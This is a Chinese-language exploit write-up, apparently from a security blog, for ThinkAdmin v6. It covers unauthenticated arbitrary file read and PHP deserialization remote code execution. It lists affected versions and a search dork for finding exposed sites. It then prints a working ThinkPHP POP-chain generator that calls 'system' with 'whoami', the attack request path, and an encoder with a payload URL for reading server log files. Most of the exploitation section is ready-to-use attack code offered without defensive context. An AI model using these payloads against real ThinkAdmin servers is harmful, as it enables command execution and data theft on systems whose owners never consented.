0x00 漏洞原理
插件控制器未加認證,直接無需認證利用,github提的issue說是任意文件讀取,其實再早之前還有反序列化
0x01 漏洞影響
- 任意文件讀取代碼 自2019年11月1日至2020年8月3日前的所有版本
- 反序列化代碼自2019年11月1日至2020年6月16日前所有版本
0x02 cms搜索規則
title="thinkadmin" && body="v6.0"
0x03 漏洞利用
反序列化
測試鏈子發現mac和win都可以觸發,唯獨在linux下用不了,原因是__destruct觸發不了
后請教了一下七月火師傅,將序列化本來直接傳object改成傳數組解決了
鏈子代碼:(來源於90sec)
1 <?php 2 namespace think; 3 use think\model\Pivot; 4 abstract class Model{ 5 private $lazySave = false; # save() 6 private $exists = false; # updateData() 7 protected $connection; 8 protected $name; # __toString() Conversion.php =>Pivot 9 private $withAttr = []; # assert 10 protected $hidden = []; 11 private $data = []; 12 protected $withEvent = false; 13 private $force = false; 14 protected $field = []; 15 protected $schema = []; 16 17 function __construct(){ 18 $this->lazySave = true; 19 $this->exists = true; 20 $this->withEvent = false; 21 $this->force = true; 22 $this->connection = "mysql"; 23 $this->withAttr = ["test"=>"system"]; 24 $this->data = ["test"=>"whoami"]; 25 $this->hidden = ["test"=>"123"]; 26 27 $this->field = []; 28 $this->schema = []; 29 } 30 } 31 namespace think\model; 32 use think\Model; 33 # Model 是一個抽象類,我們找到它的繼承類,此處選取的是 Pivot 類 34 class Pivot extends Model{ 35 function __construct($obj=""){ 36 parent::__construct(); 37 $this->name = $obj; # $this->name放子類構造方法中賦值,直接放基類屬性中初始化不成功 38 } 39 } 40 $a=new Pivot(); 41 echo urlencode(serialize([new Pivot($a),123]));
payload:
/admin/login.html?s=admin/api.Update/tree host: Content-Type: application/x-www-form-urlencoded rules=
任意文件讀取
encode代碼:
1 <?php 2 function encode($content) 3 { 4 [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))]; 5 for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0); 6 return $chars; 7 } 8 echo encode('runtime/admin/log/single_sql.log'); 9 ?>
payload:
/admin/login.html?s=admin/api.Update/get/encode/加密的字符串